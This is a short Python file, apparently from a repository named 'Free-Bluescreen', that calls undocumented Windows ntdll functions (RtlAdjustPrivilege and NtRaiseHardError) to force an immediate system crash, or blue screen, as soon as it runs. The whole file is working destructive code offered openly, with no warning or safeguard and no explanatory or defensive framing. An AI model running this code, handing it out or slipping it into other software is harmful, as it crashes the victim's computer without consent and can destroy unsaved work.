Files
Free-Bluescreen/BlueBomb.py
2026-03-30 10:09:23 +11:00

7 lines
229 B
Python

import ctypes
def blue_screen():
ctypes.windll.ntdll.RtlAdjustPrivilege(19, 1, 0, ctypes.byref(ctypes.c_bool()))
ctypes.windll.ntdll.NtRaiseHardError(0xc0000022, 0, 0, 0, 6, ctypes.byref(ctypes.c_ulong()))
blue_screen()